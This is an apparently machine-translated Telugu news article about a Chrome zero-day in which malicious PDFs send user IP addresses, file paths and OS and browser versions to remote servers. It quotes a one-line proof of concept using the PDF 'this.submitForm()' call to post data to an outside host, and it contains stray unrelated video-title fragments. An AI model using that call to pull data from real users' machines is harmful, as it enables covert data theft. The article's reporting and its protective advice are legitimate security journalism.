పిడిఎఫ్ ఫైళ్ళ ద్వారా యూజర్ డేటాను సేకరించడానికి హ్యాకర్లను Chrome దుర్బలత్వం అనుమతిస్తుంది

విషయ సూచిక:

వీడియో: Dame la cosita aaaa 2024

వీడియో: Dame la cosita aaaa 2024
Anonim

దోపిడీ గుర్తింపు సేవ ఎడ్జ్‌స్పాట్ PDF పత్రాలను దోపిడీ చేసే చమత్కారమైన Chrome సున్నా-రోజు దుర్బలత్వాన్ని కనుగొంది. Chrome లో తెరిచిన హానికరమైన PDF పత్రాలను ఉపయోగించి సున్నితమైన డేటాను సేకరించడానికి దాడి చేసేవారిని దుర్బలత్వం అనుమతిస్తుంది.

బాధితుడు గూగుల్ క్రోమ్‌లో సంబంధిత పిడిఎఫ్ ఫైల్‌లను తెరిచిన వెంటనే, హానికరమైన ప్రోగ్రామ్ యూజర్ డేటాను సేకరించడం ద్వారా నేపథ్యంలో పనిచేయడం ప్రారంభిస్తుంది.

డేటా అప్పుడు హ్యాకర్లచే నియంత్రించబడే రిమోట్ సర్వర్‌కు ఫార్వార్డ్ చేయబడుతుంది. దాడి చేసేవారు ఏ డేటాను పీల్చుకుంటున్నారో మీరు ఆలోచిస్తూ ఉండవచ్చు, వారు మీ PC లోని క్రింది డేటాను లక్ష్యంగా చేసుకుంటారు:

  • IP చిరునామా
  • సిస్టమ్‌లోని PDF ఫైల్ యొక్క పూర్తి మార్గం
  • OS మరియు Chrome సంస్కరణలు

మాల్వేర్-రిడిన్ PDF ఫైళ్ళతో జాగ్రత్త వహించండి

PDF ఫైళ్ళను తెరవడానికి అడోబ్ రీడర్ ఉపయోగించినప్పుడు ఏమీ జరగదని మీరు ఆశ్చర్యపోవచ్చు. అదనంగా, వినియోగదారు జోక్యం లేకుండా రిమోట్ సర్వర్‌లకు డేటాను బదిలీ చేయడానికి HTTP POST అభ్యర్థనలు ఉపయోగించబడతాయి.

రీడ్‌నోటిఫైకామ్ లేదా బర్ప్‌కోలాబొరాటోర్నెట్ అనే రెండు డొమైన్‌లలో ఒకటి డేటాను స్వీకరిస్తోందని నిపుణులు గుర్తించారు.

ఎడ్జ్‌స్పాట్ గుర్తించిన నమూనాలను చాలా యాంటీవైరస్ సాఫ్ట్‌వేర్ గుర్తించలేదనే వాస్తవాన్ని పరిగణనలోకి తీసుకోవడం ద్వారా మీరు దాడి యొక్క తీవ్రతను can హించవచ్చు.

వినియోగదారుల యొక్క సున్నితమైన సమాచారాన్ని సేకరించడానికి దాడి చేసేవారు “this.submitForm ()” PDF జావాస్క్రిప్ట్ API ని ఉపయోగిస్తున్నారని నిపుణులు వెల్లడించారు.

మేము దీన్ని కనీస PoC తో పరీక్షించాము, “this.submitForm ('http://google.com/test')” వంటి సాధారణ API కాల్ Google Chrome వ్యక్తిగత డేటాను google.com కు పంపేలా చేస్తుంది.

ఈ క్రోమ్ బగ్ రెండు విభిన్న హానికరమైన పిడిఎఫ్ ఫైళ్ళ ద్వారా దోపిడీ చేయబడుతుందని నిపుణులు వాస్తవానికి కనుగొన్నారు. ఈ రెండూ వరుసగా అక్టోబర్ 2017 మరియు సెప్టెంబర్ 2018 లో పంపిణీ చేయబడ్డాయి.

ముఖ్యంగా, సేకరించిన డేటాను దాడి చేసేవారు భవిష్యత్తులో దాడులను చక్కగా ఉపయోగించుకోవచ్చు. రీడ్‌నోటిఫై యొక్క పిడిఎఫ్ ట్రాకింగ్ సేవను ఉపయోగించి మొదటి బ్యాచ్ ఫైళ్లు సంకలనం చేయబడిందని నివేదికలు సూచిస్తున్నాయి.

వినియోగదారు వీక్షణలను ట్రాక్ చేయడానికి వినియోగదారులు సేవను ఉపయోగించుకోవచ్చు. ఎడ్జ్‌స్పాట్ రెండవ పిడిఎఫ్ ఫైళ్ల స్వభావానికి సంబంధించి ఎలాంటి వివరాలను పంచుకోలేదు.

ఎలా రక్షణగా ఉండాలి

ఎక్స్‌ప్లోయిట్ డిటెక్షన్ సర్వీస్ ఎడ్జ్‌స్పాట్ వినియోగదారులను క్రోమ్ వినియోగదారులను సంభావ్య ప్రమాదాల గురించి అప్రమత్తం చేయాలనుకుంది ఎందుకంటే సమీప భవిష్యత్తులో ప్యాచ్ విడుదల అవుతుందని is హించలేదు.

ఎడ్జ్‌స్పాట్ గత ఏడాది దుర్బలత్వం గురించి గూగుల్‌కు నివేదించింది మరియు ఏప్రిల్ చివరిలో ప్యాచ్‌ను విడుదల చేస్తామని కంపెనీ హామీ ఇచ్చింది. H

ఏదేమైనా, ప్రత్యామ్నాయ PDF రీడర్ అనువర్తనాన్ని ఉపయోగించి స్వీకరించిన PDF పత్రాలను స్థానికంగా చూడటం ద్వారా సమస్యకు తాత్కాలిక పరిష్కారాన్ని ఉపయోగించడాన్ని మీరు పరిగణించవచ్చు.

ప్రత్యామ్నాయంగా, మీరు మీ సిస్టమ్‌లను ఇంటర్నెట్ నుండి డిస్‌కనెక్ట్ చేయడం ద్వారా Chrome లో మీ PDF పత్రాలను కూడా తెరవవచ్చు. ఇంతలో, మీరు ఏప్రిల్ 23 న విడుదల చేయబోయే Chrome 74 నవీకరణ కోసం వేచి ఉండవచ్చు.

పిడిఎఫ్ ఫైళ్ళ ద్వారా యూజర్ డేటాను సేకరించడానికి హ్యాకర్లను Chrome దుర్బలత్వం అనుమతిస్తుంది